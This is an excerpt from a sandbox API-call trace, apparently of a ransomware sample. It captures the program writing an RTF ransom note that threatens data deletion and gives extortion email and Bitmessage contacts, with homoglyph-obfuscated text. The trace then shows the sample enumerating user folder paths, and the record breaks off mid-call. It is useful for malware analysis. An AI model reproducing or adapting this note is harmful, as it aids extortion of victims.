INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nûê9ÿâ\x8c\x9b\x8b­¹Åü\x03§#-*\n5\x90W\x1e\x1fc\x9e", lpUsedDefaultChar=0x0) returned 8717 [0295.909] WriteFile (in: hFile=0x2ec, lpBuffer=0x2358878*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2358878*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.910] CloseHandle (hObject=0x2ec) returned 1 [0295.910] Sleep (dwMilliseconds=0x3e8) [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\", cchCount2=133) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount2=130) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount2=130) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount2=130) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount2=130) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount2=133) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount2=133) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount2=133) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount2=78) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount2=78) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount2=78) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\logs\\Common\\", cchCount2=67) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount2=92) returned 1 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount2=92) returned 3 [0296.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, 